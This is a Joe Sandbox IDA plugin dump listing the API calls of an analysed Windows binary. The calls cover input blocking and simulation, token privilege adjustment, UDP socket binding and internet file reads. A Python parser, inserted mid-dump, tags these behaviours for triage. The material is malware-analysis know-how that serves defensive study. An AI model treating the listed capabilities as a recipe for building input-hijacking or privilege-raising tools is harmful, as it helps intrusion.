• LockResource.KERNEL32(002A56C2,?,?,002A56C2,?,?,00000000,00000000,?,?,?,?,?,?,002666CE,?), ref: 002D3A65
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
APIs
  • Part of subcall function 002C1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C1916
  • Part of subcall function 002C1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C1922
  • Part of subcall function 002C1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C1931
  • Part of subcall function 002C1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C1938
  • Part of subcall function 002C1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C194E
• GetLengthSid.ADVAPI32(?,00000000,002C1C81), ref: 002C20FB
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 002C2107
• HeapAlloc.KERNEL32(00000000), ref: 002C210E
• CopySid.ADVAPI32(00000000,00000000,?), ref: 002C2127
• GetProcessHeap.KERNEL32(00000000,00000000,002C1C81), ref: 002C213B
• HeapFree.KERNEL32(00000000), ref: 002C2142
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 002DA5BD
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 002DA6D0
  • Part of subcall function 002D42B9: GetInputState.USER32 ref: 002D4310
  • Part of subcall function 002D42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D43AB
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 002DA5ED
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002DA6BA
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
                                                                                                                                                                        • Opcode ID: fa802faca85f9c87333612042f736e2e177ed4701d33e93110d40ea3848d742b
                                                                                                                                                                        • Instruction ID: ac958fbd444b39cfe5bb306ab1a96ac42d4a97b38315486254ae1451e7b0db3e
                                                                                                                                                                        • Opcode Fuzzy Hash: fa802faca85f9c87333612042f736e2e177ed4701d33e93110d40ea3848d742b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9841837191120ADFCF15EF64D849EEEBBB8EF05350F144056E805A2291EB70DEA4CFA1
APIs
  • Part of subcall function 002E3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
  • Part of subcall function 002E3AAB: _wcslen.LIBCMT ref: 002E3AF8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002E22BA
• WSAGetLastError.WSOCK32 ref: 002E22E1
• bind.WSOCK32(00000000,?,00000010), ref: 002E2338
• WSAGetLastError.WSOCK32 ref: 002E2343
• closesocket.WSOCK32(00000000), ref: 002E2372
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 52e097406dd25722bf2891fca9d5d8416f350a52a7e70a2cecaf84c1137da008
• Instruction ID: fc6aafd7d00b6d1593507813783f1ffdbc8b10b4d0095864d598a1f48706cd29
• Opcode Fuzzy Hash: 52e097406dd25722bf2891fca9d5d8416f350a52a7e70a2cecaf84c1137da008
• Instruction Fuzzy Hash: DD51B375A50200AFE711AF24C886F2A77A9AF44758F44809CF9465F3C3D671AD92CFA1
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: ee27f083249a39c7a0faa8672ca70c5f5ec2515e9197aafeddf6c28a6e3afde7
• Instruction ID: 3cace3115aa1d9ca842f6e2626eeeeaeb6ea3aac9db97456d7da442ab348559d
• Opcode Fuzzy Hash: ee27f083249a39c7a0faa8672ca70c5f5ec2515e9197aafeddf6c28a6e3afde7
• Instruction Fuzzy Hash: 4821073571021ACFE710AF26D844B3AFB99EF863A0B198078E949CB351D771EC56CB90
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 002DD8CE
• GetLastError.KERNEL32(?,00000000), ref: 002DD92F
• SetEvent.KERNEL32(?,?,00000000), ref: 002DD943
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
• Opcode ID: 84307b29e053a750a46f2ed13baa07782319e7eb21fd554fcc5f4a7a79135b6a
• Instruction ID: 12dfde41219b2dd411f1144127607e70dcacb617420321bec8515be005b07401
• Opcode Fuzzy Hash: 84307b29e053a750a46f2ed13baa07782319e7eb21fd554fcc5f4a7a79135b6a
• Instruction Fuzzy Hash: D721A1B1510B06EFE7209F65D858BABB7FCEB40324F10442EE64692241D771EE15DB94
APIs
• lstrlenW.KERNEL32(?,002A46AC), ref: 002CE482
• GetFileAttributesW.KERNEL32(?), ref: 002CE491
• FindFirstFileW.KERNEL32(?,?), ref: 002CE4A2
• FindClose.KERNEL32(00000000), ref: 002CE4AE
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: ce63c25f5efa32c9e0249f0ae28277b15624c7c7697963be46c7ab7e13bc5159
• Instruction ID: 7d04b61a185e4941bbcc85101e3f99455449ab72779b69caad7592bdf36cb2ab
• Opcode Fuzzy Hash: ce63c25f5efa32c9e0249f0ae28277b15624c7c7697963be46c7ab7e13bc5159
• Instruction Fuzzy Hash: 76F0A030420D105796246B3CBC0D8BB766EAE02335B904759FC36C20E0D77899A596D5
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: f4173eacff3985e1ef83b63234578a7880fbdf409bae403d84d782a45d082a7a
• Instruction ID: 24419bf72793f32b909ff19373d8dc4791ceb3349b0269ee3f3bd1fa41484d2b
• Opcode Fuzzy Hash: f4173eacff3985e1ef83b63234578a7880fbdf409bae403d84d782a45d082a7a
• Instruction Fuzzy Hash: 29D05BB5C38118DADFC0D7909D4CDFD737CBB18380F158462F906D1001E6B09D64AB21
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00292A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00292A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00292AA1
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3aa91d09bab1318b7f427484c860c80440ba74be66f5cfa24fb2975aa5064f9e
• Instruction ID: 161d86effc7a5c5c2bd4c846ca4a50e85c8440124ae9f0b43f86a75a71fb719b
• Opcode Fuzzy Hash: 3aa91d09bab1318b7f427484c860c80440ba74be66f5cfa24fb2975aa5064f9e
• Instruction Fuzzy Hash: FA31D775911229EBCB61DF64D98879CBBB8BF08310F5041EAE80CA6261E7309F95CF45
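The function records above (the UDP socket/bind sequence, the InternetReadFile loop with a 0x400-byte buffer, the FindFirstFileW enumeration, and the IsDebuggerPresent/UnhandledExceptionFilter triple) all follow the same Joe Sandbox IDA Plugin layout: an "APIs" list of `name.MODULE(args), ref: addr` lines, where resolved constants are given in hex and unresolved arguments as `?`, followed by the API ID and fuzzy hashes. The Python below is an added example, not Joe Sandbox tooling and not code from the analysed sample: it parses that layout into structured call lists, decodes the resolved constants (for example `socket(00000002,00000002,00000011)` as AF_INET/SOCK_DGRAM/IPPROTO_UDP), and derives behaviour tags. The SAMPLE text is constructed from two of the records above, and the tag names are this example's own convention. One caveat the tagging encodes: IsDebuggerPresent immediately followed by SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter is the sequence the MSVC CRT emits in its fastfail/abort path, so counting it as an author-written anti-debugging check over-reports.

```python
"""Parse Joe Sandbox function records ("APIs" / "Similarity" blocks) into API-call
sequences and tag behaviour from the decoded argument constants.

Added example: not Joe Sandbox tooling and not the analysed sample's code.  SAMPLE is
constructed from records on this page; tag names are this example's own convention."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """APIs
  • Part of subcall function 002E3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
  • Part of subcall function 002E3AAB: _wcslen.LIBCMT ref: 002E3AF8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002E22BA
• WSAGetLastError.WSOCK32 ref: 002E22E1
• bind.WSOCK32(00000000,?,00000010), ref: 002E2338
• WSAGetLastError.WSOCK32 ref: 002E2343
• closesocket.WSOCK32(00000000), ref: 002E2372
Memory Dump Source
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Instruction Fuzzy Hash: DD51B375A50200AFE711AF24C886F2A77A9AF44758F44809CF9465F3C3D671AD92CFA1
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00292A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00292A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00292AA1
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Instruction Fuzzy Hash: FA31D775911229EBCB61DF64D98879CBBB8BF08310F5041EAE80CA6261E7309F95CF45
"""

# One call line:  [Part of subcall function ADDR:] name.MODULE[(args)][,] ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
    r"([\w@]+)\.([A-Za-z0-9_]+)"
    r"(?:\((.*?)\))?"
    r",?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]          # resolved hex constants as int, '?' as None
    ref: int                           # address of the call site
    subcall_of: Optional[int] = None   # set when the call sits in a callee the plugin folded in

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""

def _parse_args(raw):
    if not raw:
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in raw.split(",")]

def parse_records(text):
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                      # every record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            sub, name, mod, raw_args, ref = m.groups()
            cur.calls.append(ApiCall(name, mod, _parse_args(raw_args), int(ref, 16),
                                     int(sub, 16) if sub else None))
            continue
        s = s.lstrip("•").strip()            # metadata lines: keep the two we use
        if s.startswith("API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = s.split(":", 1)[1].strip()
    return records

AF_INET, SOCK_DGRAM, IPPROTO_UDP = 2, 2, 17   # Winsock constants

def tag_record(rec):
    """Behaviour tags from call names plus the constants the plugin resolved."""
    names = {c.name for c in rec.calls}
    tags = set()
    for c in rec.calls:
        if c.name == "socket" and c.args[:3] == [AF_INET, SOCK_DGRAM, IPPROTO_UDP]:
            tags.add("udp_socket")
    if "udp_socket" in tags and "bind" in names:
        tags.add("udp_bind")
    if "InternetReadFile" in names:
        tags.add("wininet_read")
    if "FindFirstFileW" in names:
        tags.add("file_enumeration")
    if "AdjustTokenPrivileges" in names:
        tags.add("token_privilege_adjust")
    if "IsDebuggerPresent" in names:
        # IsDebuggerPresent -> SetUnhandledExceptionFilter(NULL) -> UnhandledExceptionFilter
        # is the MSVC CRT fastfail/abort path: compiler scaffolding, not an author-written
        # anti-debugging check, so it gets its own tag instead of "debugger_check".
        if {"SetUnhandledExceptionFilter", "UnhandledExceptionFilter"} <= names:
            tags.add("crt_fastfail_pattern")
        else:
            tags.add("debugger_check")
    return sorted(tags)

def summarize(text):
    """Map each record's API ID to its tags; records with an empty APIs list are skipped."""
    return {r.api_id: tag_record(r) for r in parse_records(text) if r.calls}

if __name__ == "__main__":
    for api_id, tags in summarize(SAMPLE).items():
        print(f"{api_id:50s} {', '.join(tags) or '-'}")
```

Feeding the whole disassembly section through `summarize` gives one tag set per function, keyed by the plugin's own API ID, which is a compact way to triage hundreds of records before opening the ones worth reading in IDA. Records whose "APIs" header has no call lines (as two of the records on this page do) are skipped rather than mis-tagged.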
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0028014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002809D8
                                                                                                                                                                          • Part of subcall function 0028014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002809F5
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C205A
                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C2087
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002C2097
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                                                        • Opcode ID: afca18860e6c808a4e40081cf00d41330973363cc1b2e4932c10a546891b2840
                                                                                                                                                                        • Instruction ID: 5c896eeba2b4c58b77eef7602f7e259261ea3cfda3a2e268d2404e0235860d06
                                                                                                                                                                        • Opcode Fuzzy Hash: afca18860e6c808a4e40081cf00d41330973363cc1b2e4932c10a546891b2840
                                                                                                                                                                        • Instruction Fuzzy Hash: 8311BFB2424305EFD718AF54ECCAE6BB7B9EB44760B20852EE04653291DB70BC55CB24
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0028502E,?,003298D8,0000000C,00285185,?,00000002,00000000), ref: 00285079
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0028502E,?,003298D8,0000000C,00285185,?,00000002,00000000), ref: 00285080
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00285092
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: bb4f54c633dccacb565dcfcc6a376a0e88b61d2c0e4e471b5133ff23aba74f47
                                                                                                                                                                        • Instruction ID: 2d1e819877a23dbf7f08ced22ffc566d1b6777c9cc5487351cf9cac2d739d3f8
                                                                                                                                                                        • Opcode Fuzzy Hash: bb4f54c633dccacb565dcfcc6a376a0e88b61d2c0e4e471b5133ff23aba74f47
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BE04632411508AFCF217F60ED0CE683B6AEB14391F014064F9098A161DB3AED62CFC0
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 002BE664
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                        • String ID: X64
                                                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                                                        • Opcode ID: 00240cbe4466cfeb8a480c6f6ad57cdb927158f1bb74db4cc7ddd76502092590
                                                                                                                                                                        • Instruction ID: ec148ace329ba77218d91c279be3340c9566176f43fcc60c4b01bb577ba3ac91
                                                                                                                                                                        • Opcode Fuzzy Hash: 00240cbe4466cfeb8a480c6f6ad57cdb927158f1bb74db4cc7ddd76502092590
                                                                                                                                                                        • Instruction Fuzzy Hash: DED0C9B482111DEACF80CB50EC88DDD737CBB04344F1146A6F106A2000DB70A5488F20
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4229
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4239
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                        • Opcode ID: c7af082bae1de0bc4ae124e6f557f9d44f13761b2072eda89c02aa012645df1f
                                                                                                                                                                        • Instruction ID: 4d87cd8e010bc7deb859be04bdf000c1a658346cd787fdd06f76e9e7f0ed4b91
                                                                                                                                                                        • Opcode Fuzzy Hash: c7af082bae1de0bc4ae124e6f557f9d44f13761b2072eda89c02aa012645df1f
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0A0306102256BE7202A65AC4DFEB366EEFC5761F00017AF905D2281D9709E40CAB0
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002CBC24
                                                                                                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 002CBC37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                                        • Opcode ID: 0bccb2a4aafec50a0fdf5e636745d3bc402dc73c5356e5ed9a9a57e15d92965f
                                                                                                                                                                        • Instruction ID: add8caddb1f807246edb812cde32dce8bc99833e632371bba580ceac0ce06e48
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bccb2a4aafec50a0fdf5e636745d3bc402dc73c5356e5ed9a9a57e15d92965f
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EF0677081024EAFDB019FA0D80ABFEBBB0FF08319F00801AF955AA192C3798211DF94
                                                                                                                                                                        APIs
                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C1B48), ref: 002C1A20
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,002C1B48), ref: 002C1A35
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                                        • Opcode ID: 992a7459ece37d60b32fc1e4744ec9b27f5f76f12d4dc1aca27f21b8394e3038
                                                                                                                                                                        • Instruction ID: cb39dd0c00c1256507d160515a0237d2e9f170057dfa7f52d2147e9626e7213b
                                                                                                                                                                        • Opcode Fuzzy Hash: 992a7459ece37d60b32fc1e4744ec9b27f5f76f12d4dc1aca27f21b8394e3038
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CE04F76015610AFE7252B10FC4AF7277A9EB04360F14892DF599804B0DB62ACA0EF14
                                                                                                                                                                        APIs
                                                                                                                                                                        • BlockInput.USER32(00000001), ref: 002DF51A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 7a90e47fa9c2bcecf971e00070abc6e718156c2b2b7e5843bf9c80117363ae0a
• Instruction ID: 4e54fcbc0b3bf8a3fe8064a2c0ff91ea8fe2e4fb09f93b8f6f1f9877d0908d86
• Opcode Fuzzy Hash: 7a90e47fa9c2bcecf971e00070abc6e718156c2b2b7e5843bf9c80117363ae0a
• Instruction Fuzzy Hash: FBE048352202055FC750AF69E404956F7DCAFA4761F008426F84AC7351D670FD90CB94
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002CEC95
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
